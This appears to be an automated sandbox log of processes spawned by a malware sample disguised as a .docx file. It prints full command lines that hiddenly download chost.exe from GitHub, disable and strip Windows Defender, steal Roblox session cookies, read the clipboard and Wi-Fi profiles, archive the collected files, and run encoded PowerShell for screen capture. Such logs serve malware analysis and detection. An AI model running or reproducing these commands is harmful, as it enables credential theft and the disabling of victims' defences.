EUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\calc.exe calc.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
